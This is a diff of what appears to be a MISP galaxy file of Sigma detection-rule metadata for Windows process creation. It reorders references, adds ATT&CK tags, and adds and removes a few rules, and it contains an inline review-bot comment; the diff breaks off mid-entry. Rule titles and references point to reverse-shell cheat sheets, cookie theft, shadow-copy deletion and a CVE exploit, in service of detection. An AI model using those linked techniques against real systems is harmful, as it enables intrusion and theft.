+ "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior",
+ "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior",
+ "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml"
 ],
 "tags": [
@@ -47404,12 +48070,24 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
 "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1048"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124",
 "value": "Suspicious Redirection to Local Admin Share"
 },
@@ -47459,14 +48137,14 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
- "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
- "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
- "https://twitter.com/Hexacorn/status/776122138063409152",
- "https://github.com/SigmaHQ/sigma/issues/3742",
 "https://twitter.com/gN3mes1s/status/941315826107510784",
+ "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://github.com/SigmaHQ/sigma/issues/3742",
+ "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/Hexacorn/status/776122138063409152",
+ "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml"
 ],
 "tags": [
@@ -47508,8 +48186,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
 "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
+ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
 "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml"
 ],
@@ -47643,8 +48321,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://ss64.com/nt/cmd.html",
 "https://twitter.com/cyb3rops/status/1562072617552678912",
+ "https://ss64.com/nt/cmd.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_no_space_execution.yml"
 ],
 "tags": [
@@ -47677,8 +48355,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/nao_sec/status/1530196847679401984",
 "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+ "https://twitter.com/nao_sec/status/1530196847679401984",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml"
 ],
 "tags": [
@@ -47762,9 +48440,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
 "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
 "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
- "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml"
 ],
 "tags": [
@@ -47797,8 +48475,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/",
 "https://twitter.com/SBousseaden/status/1278977301745741825",
+ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml"
 ],
 "tags": [
@@ -47865,11 +48543,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/Hexacorn/status/885553465417756673",
- "https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/",
- "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques",
 "https://twitter.com/Hexacorn/status/885570278637678592",
+ "https://twitter.com/Hexacorn/status/885553465417756673",
 "https://twitter.com/vysecurity/status/885545634958385153",
+ "https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques",
+ "https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml"
 ],
 "tags": [
@@ -48028,8 +48706,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)",
 "https://ss64.com/nt/dsacls.html",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml"
 ],
 "tags": [
@@ -48208,8 +48886,20 @@
 "https://twitter.com/ankit_anubhav/status/1518835408502620162",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_child_processes.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647",
 "value": "Potentially Suspicious PowerShell Child Processes"
 },
@@ -48258,8 +48948,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md",
- "https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a",
 "https://securelist.com/locked-out/68960/",
+ "https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_portable_execution.yml"
 ],
 "tags": [
@@ -48279,6 +48969,41 @@
 "uuid": "77df53a5-1d78-4f32-bc5a-0e7465bd8f41",
 "value": "Portable Gpg.EXE Execution"
 },
+ {
+ "description": "Detects suspicious child processes of the \"Manage Engine ServiceDesk Plus\" Java web service",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2023/01/18",
+ "falsepositive": [
+ "Legitimate sub processes started by Manage Engine ServiceDesk Pro"
+ ],
+ "filename": "proc_creation_win_java_manageengine_susp_child_process.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py",
+ "https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/",
+ "https://blog.viettelcybersecurity.com/saml-show-stopper/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1102"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "cea2b7ea-792b-405f-95a1-b903ea06458f",
+ "value": "Suspicious Child Process Of Manage Engine ServiceDesk"
+ },
 {
 "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule",
 "meta": {
@@ -48315,7 +49040,7 @@
 }
 ],
 "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614",
- "value": "New Port Forwarding Rule Added Via Netsh.EXX"
+ "value": "New Port Forwarding Rule Added Via Netsh.EXE"
 },
 {
 "description": "Detects execution of the \"VMwareToolBoxCmd.exe\" with the \"script\" and \"set\" flag to setup a specific script to run for a specific VM state",
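Review bot: The new "Suspicious Child Process Of Manage Engine ServiceDesk" entry names the product inconsistently — `description` says "Manage Engine ServiceDesk Plus" while `falsepositive` says "Manage Engine ServiceDesk Pro"; the product is ServiceDesk Plus, so the false-positive line should read `"Legitimate sub processes started by Manage Engine ServiceDesk Plus"`. The three non-Sigma refs all describe exploitation of the SAML endpoint tracked as CVE-2022-47966, which reads more like attack.t1190 (exploit public-facing application) than the attack.t1102 web-service C2 technique the entry is tagged with; that mapping appears to be inherited from the upstream rule named in `filename`, so both corrections would need to land in SigmaHQ and flow back on the next regeneration of this file rather than be hand-edited here.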
@@ -48330,8 +49055,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/",
 "https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/",
+ "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml"
 ],
 "tags": [
@@ -48552,8 +49277,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/gN3mes1s/status/1222088214581825540",
- "https://twitter.com/gN3mes1s/status/1222095963789111296",
 "https://twitter.com/gN3mes1s/status/1222095371175911424",
+ "https://twitter.com/gN3mes1s/status/1222095963789111296",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml"
 ],
 "tags": [
@@ -48586,8 +49311,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
 "https://twitter.com/orange_8361/status/1518970259868626944",
+ "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml"
 ],
 "tags": [
@@ -48611,8 +49336,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"
 ],
 "tags": [
@@ -48757,9 +49482,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/defaultnamehere/cookie_crimes/",
- "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password",
- "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/",
 "https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/",
+ "https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/",
+ "https://mango.pdf.zone/stealing-chrome-cookies-without-a-password",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml"
 ],
 "tags": [
@@ -48823,8 +49548,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2",
 "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set",
+ "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml"
 ],
 "tags": [
@@ -48934,9 +49659,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
 "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/",
 "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"
 ],
 "tags": [
@@ -48969,8 +49694,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/",
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml"
 ],
 "tags": [
@@ -49003,8 +49728,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
 "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
+ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml"
 ],
 "tags": [
@@ -49061,8 +49786,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://pentestlab.blog/2017/03/30/weak-service-permissions/",
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://pentestlab.blog/2017/03/30/weak-service-permissions/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml"
 ],
 "tags": [
@@ -49131,8 +49856,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp",
 "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml"
 ],
 "tags": [
@@ -49165,8 +49890,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/mandiant/SharPersist",
 "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit",
+ "https://github.com/mandiant/SharPersist",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml"
 ],
 "tags": [
@@ -49273,8 +49998,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/3proxy/3proxy",
 "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://github.com/3proxy/3proxy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml"
 ],
 "tags": [
@@ -49344,9 +50069,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
 "https://www.revshells.com/",
 "https://docs.python.org/3/using/cmdline.html#cmdoption-c",
+ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml"
 ],
 "tags": [
@@ -49505,8 +50230,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://nsudo.m2team.org/en-us/",
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://nsudo.m2team.org/en-us/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml"
 ],
 "tags": [
@@ -49590,15 +50315,15 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
- "https://blog.talosintelligence.com/2017/05/wannacry.html",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
 "https://github.com/Neo23x0/Raccine#the-process",
- "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
 "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
 "https://redcanary.com/blog/intelligence-insights-october-2021/",
+ "https://blog.talosintelligence.com/2017/05/wannacry.html",
+ "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
 "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"
 ],
 "tags": [
@@ -49640,8 +50365,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "Turla has used fsutil fsinfo drives to list connected drives.",
 "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml",
+ "Turla has used fsutil fsinfo drives to list connected drives.",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml"
 ],
 "tags": [
@@ -49708,9 +50433,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://man.openbsd.org/ssh_config#ProxyCommand",
- "https://man.openbsd.org/ssh_config#LocalCommand",
 "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files",
+ "https://man.openbsd.org/ssh_config#LocalCommand",
+ "https://man.openbsd.org/ssh_config#ProxyCommand",
 "https://gtfobins.github.io/gtfobins/ssh/",
 "https://lolbas-project.github.io/lolbas/Binaries/Ssh/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"
@@ -49912,8 +50637,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
 "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml"
 ],
 "tags": [
@@ -49982,8 +50707,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/_JohnHammond/status/1588155401752788994",
 "Internal Research",
+ "https://twitter.com/_JohnHammond/status/1588155401752788994",
 "https://twitter.com/Max_Mal_/status/1633863678909874176",
 "https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml"
@@ -50080,39 +50805,6 @@
 "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97",
 "value": "Potential Suspicious Registry File Imported Via Reg.EXE"
 },
- {
- "description": "Detects suspicious command line arguments of common data compression tools",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Samir Bousseaden",
- "creation_date": "2019/10/15",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_compression_params.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/SBousseaden/status/1184067445612535811",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_compression_params.yml"
- ],
- "tags": [
- "attack.collection",
- "attack.t1560.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd",
- "value": "Suspicious Compression Tool Parameters"
- },
 {
 "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries",
 "meta": {
@@ -50192,13 +50884,13 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32",
- "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32",
- "https://twitter.com/CyberRaiju/status/1251492025678983169",
- "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/",
 "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
+ "https://twitter.com/CyberRaiju/status/1251492025678983169",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32",
 "https://www.cobaltstrike.com/help-opsec",
+ "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml"
 ],
 "tags": [
@@ -50231,11 +50923,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
- "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
 "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
+ "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
+ "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
 "https://twitter.com/egre55/status/1087685529016193025",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml"
 ],
 "tags": [
@@ -50434,8 +51126,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/decoder-it/LocalPotato",
 "https://www.localpotato.com/localpotato_html/LocalPotato.html",
+ "https://github.com/decoder-it/LocalPotato",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml"
 ],
 "tags": [
@@ -50528,8 +51220,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
 "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade",
+ "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_new_network_provider.yml"
 ],
 "tags": [
@@ -50596,9 +51288,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Winget/",
- "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install",
 "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget",
+ "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install",
+ "https://lolbas-project.github.io/lolbas/Binaries/Winget/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml"
 ],
 "tags": [
@@ -50665,9 +51357,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
 "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps",
 "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/",
+ "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml"
 ],
 "tags": [
@@ -50738,8 +51430,20 @@
 "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df",
 "value": "Suspicious Process Parents"
 },
@@ -50758,8 +51462,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml"
 ],
 "tags": [
@@ -50882,9 +51586,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
 "https://twitter.com/_st0pp3r_/status/1583914515996897281",
 "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml"
 ],
 "tags": [
@@ -50920,8 +51624,32 @@
 "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.initial_access",
+ "attack.persistence",
+ "attack.privilege_escalation",
